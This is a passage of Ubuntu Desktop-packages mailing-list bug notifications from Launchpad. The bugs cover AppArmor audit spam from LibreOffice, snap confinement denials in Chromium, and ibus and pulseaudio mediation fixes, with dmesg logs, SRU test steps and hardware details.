pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [13682.604138] audit: type=1400 audit(1571920851.153:3677): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris-22028640.log" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [13683.097648] audit: type=1400 audit(1571920851.645:3678): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.mozilla/firefox/vq2zzheq.chris-2019-09/cert8.db" pid=17791 comm="soffice.bin" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000 [16676.510664] kauditd_printk_skb: 1210 callbacks suppressed [16676.510665] audit: type=1400 audit(1571923845.047:4889): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.511473] audit: type=1400 audit(1571923845.047:4890): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.550636] audit: type=1400 audit(1571923845.087:4891): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.551394] audit: type=1400 audit(1571923845.087:4892): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.552145] audit: type=1400 audit(1571923845.087:4893): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.552568] audit: type=1400 audit(1571923845.087:4894): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.553912] audit: type=1400 audit(1571923845.091:4895): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=18543 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000 [16694.388901] audit: type=1400 audit(1571923862.923:4896): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/mountinfo" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [16694.388972] audit: type=1400 audit(1571923862.923:4897): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/cgroup" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [16694.388992] audit: type=1400 audit(1571923862.923:4898): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice
[Desktop-packages] [Bug 1849680] Re: audit spam in dmesg (libreoffice)
libreoffice ships this profile, so the bug should be tracked there. ** Package changed: apparmor (Ubuntu) => libreoffice (Ubuntu) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu. https://bugs.launchpad.net/bugs/1849680 Title: audit spam in dmesg (libreoffice) Status in libreoffice package in Ubuntu: New Bug description: My dmesg is getting flooded by apparmor audit messages, mostly from libreoffice (profiles libreoffice-soffice and libreoffice-oosplash): $ dmesg | tail -n 25 [13682.452555] audit: type=1400 audit(1571920851.001:3672): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.453430] audit: type=1400 audit(1571920851.001:3673): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.453933] audit: type=1400 audit(1571920851.001:3674): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.455491] audit: type=1400 audit(1571920851.005:3675): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=17792 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000 [13682.604100] audit: type=1400 audit(1571920851.153:3676): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [13682.604138] audit: type=1400 audit(1571920851.153:3677): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris-22028640.log" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [13683.097648] audit: type=1400 audit(1571920851.645:3678): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.mozilla/firefox/vq2zzheq.chris-2019-09/cert8.db" pid=17791 comm="soffice.bin" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000 [16676.510664] kauditd_printk_skb: 1210 callbacks suppressed [16676.510665] audit: type=1400 audit(1571923845.047:4889): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.511473] audit: type=1400 audit(1571923845.047:4890): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.550636] audit: type=1400 audit(1571923845.087:4891): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.551394] audit: type=1400 audit(1571923845.087:4892): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.552145] audit: type=1400 audit(1571923845.087:4893): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.552568] audit: type=1400 audit(1571923845.087:4894): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.553912] audit: type=1400 audit(1571923845.091:4895): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=18543 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000 [16694.388901] audit: type=1400 audit(1571923862.923:4896): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/mountinfo" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [16694.388972] audit: type=1400 audit(1571923862.923:4897): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/cgroup" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [16694.388992] audit: type=1400 audit(1571923862.923:4898): apparmor="ALLOWED" operation="open" profile="lib
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: apparmor Status: Triaged => In Progress -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in AppArmor: In Progress Status in snapd: In Progress Status in chromium-browser package in Ubuntu: Invalid Status in snapd package in Ubuntu: Triaged Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1482852] Re: apparmor profile usr.bin.firefox missing abstractions/ubuntu-helpers
** Package changed: apparmor (Ubuntu) => firefox (Ubuntu) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu. https://bugs.launchpad.net/bugs/1482852 Title: apparmor profile usr.bin.firefox missing abstractions/ubuntu-helpers Status in firefox package in Ubuntu: New Bug description: When trying to open link to a torrent apparmor denies my bittorrent client. the log message I got is: audit: type=1400 audit(1439028251.208:1075): apparmor="DENIED" operation="exec" info="profile not found" error=-13 profile="/usr/lib/firefox/firefox{,*[^s][^h]}" name="/usr/bin /transmission-gtk" pid=32092 comm="firefox" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0 Although ubuntu-helpers is included in abstractions/ubuntu-bittorrent-clients to allow x access to transmission, firefox profile also need to include abstractions/ubuntu-helpers. It is also strange that when I add definition of ubuntu-helpers to usr.bin.firefox aa-enforce fails during bootup with message Multiple definitions for hat sanitized_helper in profile (null) exist,bailing out. but when I restart it it seam to set profiles OK with no error. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/firefox/+bug/1482852/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fcitx, ...)
@Gunnar - I am preparing the focal upload now, though there is a parser bug (bug 1856738) which means I cannot use @{HOME} in the rule and instead hardcode /home/*/. This will cover all typical situations (ie, not the atypical /root/.cache/ibus...) except when the user updates /etc/apparmor.d/tunables/home.d/ to add a different directory for home. With snaps (this bug) we don't support alternate locations for /home just yet, so this is not a regression. We plan to fix that parser bug for 20.04. You may want to hold off on a 1.5.22 upload (or revert the XDG patch) until this is updated to avoid regression non-snap, ibus abstraction apparmor users with non-default home. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to ibus in Ubuntu. https://bugs.launchpad.net/bugs/1580463 Title: Snap blocks access to system input methods (ibus, fcitx, ...) Status in ibus: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in ibus package in Ubuntu: In Progress Status in im-config package in Ubuntu: Fix Released Status in snapd package in Ubuntu: Fix Released Status in apparmor source package in Xenial: Fix Released Status in im-config source package in Xenial: Fix Released Status in snapd source package in Xenial: Fix Released Status in apparmor source package in Yakkety: Fix Released Status in im-config source package in Yakkety: Fix Released Status in snapd source package in Yakkety: Fix Released Bug description: = SRU im-config = [Impact] ibus-daemon by default uses a unix socket name of /tmp/dbus-... that is indistinguishable from dbus-daemon abstract sockets. While dbus-daemon has AppArmor mediation, ibus-daemon does not so it is important that its abstract socket not be confused with dbus-daemon's. By modifying ibus-daemon's start arguments to use "--address 'unix:tmpdir=/tmp/ibus'" AppArmor can continue mediating DBus abstract sockets like normal and also mediate access to the ibus-daemon-specific abstract socket via unix rules. This also tidies up the abstract socket paths so that it is clear which are for ibus-daemon, which for dbus-daemon, etc. The upload simply adjusts 21_ibus.rc to start ibus-daemon with "-- address 'unix:tmpdir=/tmp/ibus'" and adds a comment. No compiled code changes are required. [Test Case] 1. start a unity session before updating to the package in -proposed 2. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0 IBUS_ADDRESS=unix:abstract=/tmp/dbus-Vyx8fGFA,guid=28e8e7e89f902c8d4e9d77c5557add76 3. $ lsof -p $(pidof ibus-daemon) | grep '/dbus' ibus-daem 2973 jamie8u unix 0x 0t0 29606 @/tmp/dbus-oxKYpN30 type=STREAM 4. update the package in -proposed and perform '2' and '3'. The IBUS_ADDRESSES should be the same as before 5. logout of unity, then log back in 6. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0 IBUS_ADDRESS=unix:abstract=/tmp/ibus/dbus-SpxOl8Fc,guid=06d4bbeb07614c6dffbf221c57473f4e (notice '/tmp/ibus/' in the path) 7. $ lsof -p $(pidof ibus-daemon) | grep '/dbus' ibus-daem 3471 jamie8u unix 0x 0t0 26107 @/tmp/ibus/dbus-SpxOl8Fc type=STREAM ... (notice '@/tmp/ibus/' in the path) In addition to the above, you can test for regressions by opening 'System Settings' under the 'gear' icon in the panel and selecting 'Text Entry'. From there, add an input source on the right, make sure 'Show current input source in the menu bar' is checked, then use the input source panel indicator to change input sources. Extended test case to verify input support still works in unconfined and confined applications: 1. Systems Settings Language Support, if prompted install the complete language support 2. Install Chinese (simple and traditional) 3. sudo apt-get install ibus-pinyin ibus-sunpinyin 4. logout / login 5. System Settings / Text Entry - add Chinese (Pinyin) (IBus) 6. select pinyin from the indicator 7. sudo lsof | grep ibus | grep @ # will use @/tmp/dbus-... 8. open gnome-calculator and try to type something in (should get a pop-up) 9. open evince and try to search a pdf (should get a pop up) 10. upgrade apparmor and im-config from xenial-proposed 11. logout and back in 12. sudo lsof | grep ibus | grep @ # will use @/tmp/ibus/... 13. open gnome-calculator and try to type something in (should get a pop-up) 14. open evince and try to search a pdf (should get a pop up) 15. verify no new apparmor denials [Regression Potential] The regression potential is considered low because there are no compiled code changes and because the changes only occur after ibus- daemon is restarted, which is upon session start, not package upgrade. When it is restarted, the files in ~/.config/ibus/bus/*-unix-0 are updated accordingly for other applications to pick up. This change intentionally requires a change to the unity7 snapd
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Note, there is a spread test in snapd that checks for if the mediation patches are dropped (or added). While it is fine for https://launchpad.net/bugs/1856054 to be fast tracked, this pulseaudio bug should not be marked as Fix Released before the end of year break unless you coordinate with the snapd team first so as to avoid the spread test failing when no one is around to fix it. Specifically, snapd needs: https://github.com/snapcore/snapd/pull/7885 https://github.com/snapcore/snapd/pull/7886 To be clear, the snapd deb doesn't need to be involved in any of this; it is just coordinating with upstream so the upstream CI doesn't break over the holidays. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Fix Committed Status in pulseaudio source package in Bionic: Fix Committed Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wa
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
** Changed in: snapd Status: In Progress => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1851211 Title: [snap] SoloKeys not supported by u2f-devices interface Status in snapd: Fix Released Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: Triaged Bug description: This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium- browser/+bug/1738164 it is still open. No chance to use such a key in the browser. dmesg output is: My dmesg out put shows a lot of DENIED: audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?' [ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 Suggested solutions in the other tickets do not work System is Ubuntu 19.10 on an Asus UX330 --- ProblemType: Bug ApportVersion: 2.20.11-0ubuntu8.2 Architecture: amd64 CurrentDesktop: ubuntu:GNOME DRM.card0-HDMI-A-1: enabled: enabled dpms: On status: connected edid-base64: AP///wAebcxW838CAAYUAQOANR54Cq7FoldKnCUSUFQhCACzAIGAgUABAQEBAQEBAQEBGjaAoHA4H0AwIDUAEyshAAAaAjqAGHE4LUBYLEUAEyshAAAe/QA4PR5TDwAKICAgICAg/ABXMjQ0MgogICAgICAgATICAyHxTpAEAwEUEgUfEBMAIwkHB4MBAABlAwwAEAACOoAYcTgtQFgsRQATKyEAAB4BHYAYcRwWIFgsJQATKyEAAJ4BHQByUdAeIG4oVQATKyEAAB6MCtCKIOAtEBA+lgATKyEAABgAJg== modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480 DRM.card0-eDP-1: enabled: disabled dpms: Off status: connected edid-base64: AP///wAGry0nABAZAQSVHRF4ArwFolVMmiUOUFQBAQEBAQEBAQEBAQEBAQEBFDeAuHA4JEAQED4AJaUQAAAY/gBBVU8KICAgICAgICAg/gBCMTMzSEFOMDIuNyAKAII= modes: 1920x1080 DiskUsage: Filesystem Type Size Used Avail Use% Mounted on /dev/sda6 ext4 184G 35G 140G 20% /home tmpfs tmpfs 7,8G 152M 7,7G 2% /dev/shm /dev/sda6 ext4 184G 35G 140G 20% /home DistroRelease: Ubuntu 19.10 InstallationDate: Installed on 2017-09-30 (766 days ago) InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0a2b Intel Corp. Bus 001 Device 003: ID 0bda:58d1 Realtek Semiconductor Corp. USB2.0 HD UVC WebCam Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: ASUSTeK COMPUTER INC. UX330UAK Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1 PackageArchitecture: amd64 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=33f0c319-6f77-49d2-85ed-236d397fc004 ro quiet splash vt.handoff=7 ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1 Snap.ChromeDriverVersion: ChromeDriver 78.0.3904.70 (edb9c9f3de0247fd912a77b7f6cae7447f6d3ad5-refs/branch-heads/3904@{#800}) Snap.ChromiumVersion: Chromium 78.0.3904.70 snap Tags: eoan snap Uname: Linux 5.3.0-19-generic x86_64 UpgradeStatus: Upgraded to eoan on 2019-10-23 (14 days ago) UserGroups: adm cdrom daemon dialout dip docker kvm lpadmin plugdev sambashare sudo www-data _MarkForUpload: True dmi.bios.date: 04/19/2019 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: UX330UAK.315 dmi.board.asset.tag: ATN123456
[Desktop-packages] [Bug 1855477] Re: gnome-control-center will not let me paste in a password from my password manger
Thank you for using Ubuntu and reporting a bug. Are you using wayland or Xorg for your desktop session? What password manager are you using? ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-control-center in Ubuntu. https://bugs.launchpad.net/bugs/1855477 Title: gnome-control-center will not let me paste in a password from my password manger Status in gnome-control-center package in Ubuntu: New Bug description: Gnome-control-center online-accounts will not let me paste my google password in.Since I use long secure complex passwords, typing in passwords is not a viable option. Please fix this bug. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-control-center/+bug/1855477/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
https://github.com/snapcore/snapd/pull/7779 ** Also affects: snapd Importance: Undecided Status: New ** Changed in: snapd (Ubuntu) Assignee: Jamie Strandboge (jdstrand) => (unassigned) ** Changed in: snapd Importance: Undecided => Low ** Changed in: snapd Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: snapd Milestone: None => 2.42.3 ** Changed in: snapd (Ubuntu) Status: In Progress => Triaged ** Changed in: snapd Status: New => In Progress -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in AppArmor: Triaged Status in snapd: In Progress Status in chromium-browser package in Ubuntu: Invalid Status in snapd package in Ubuntu: Triaged Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
https://github.com/snapcore/snapd/pull/7779 ** Also affects: snapd Importance: Undecided Status: New ** Changed in: snapd Status: New => In Progress ** Changed in: snapd Importance: Undecided => Medium ** Changed in: snapd Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: snapd (Ubuntu) Status: In Progress => Triaged ** Changed in: snapd (Ubuntu) Importance: Undecided => Medium ** Changed in: snapd (Ubuntu) Assignee: Jamie Strandboge (jdstrand) => (unassigned) ** Changed in: snapd Milestone: None => 2.42.3 -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1851211 Title: [snap] SoloKeys not supported by u2f-devices interface Status in snapd: In Progress Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: Triaged Bug description: This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium- browser/+bug/1738164 it is still open. No chance to use such a key in the browser. dmesg output is: My dmesg out put shows a lot of DENIED: audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?' [ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 Suggested solutions in the other tickets do not work System is Ubuntu 19.10 on an Asus UX330 --- ProblemType: Bug ApportVersion: 2.20.11-0ubuntu8.2 Architecture: amd64 CurrentDesktop: ubuntu:GNOME DRM.card0-HDMI-A-1: enabled: enabled dpms: On status: connected edid-base64: AP///wAebcxW838CAAYUAQOANR54Cq7FoldKnCUSUFQhCACzAIGAgUABAQEBAQEBAQEBGjaAoHA4H0AwIDUAEyshAAAaAjqAGHE4LUBYLEUAEyshAAAe/QA4PR5TDwAKICAgICAg/ABXMjQ0MgogICAgICAgATICAyHxTpAEAwEUEgUfEBMAIwkHB4MBAABlAwwAEAACOoAYcTgtQFgsRQATKyEAAB4BHYAYcRwWIFgsJQATKyEAAJ4BHQByUdAeIG4oVQATKyEAAB6MCtCKIOAtEBA+lgATKyEAABgAJg== modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480 DRM.card0-eDP-1: enabled: disabled dpms: Off status: connected edid-base64: AP///wAGry0nABAZAQSVHRF4ArwFolVMmiUOUFQBAQEBAQEBAQEBAQEBAQEBFDeAuHA4JEAQED4AJaUQAAAY/gBBVU8KICAgICAgICAg/gBCMTMzSEFOMDIuNyAKAII= modes: 1920x1080 DiskUsage: Filesystem Type Size Used Avail Use% Mounted on /dev/sda6 ext4 184G 35G 140G 20% /home tmpfs tmpfs 7,8G 152M 7,7G 2% /dev/shm /dev/sda6 ext4 184G 35G 140G 20% /home DistroRelease: Ubuntu 19.10 InstallationDate: Installed on 2017-09-30 (766 days ago) InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0a2b Intel Corp. Bus 001 Device 003: ID 0bda:58d1 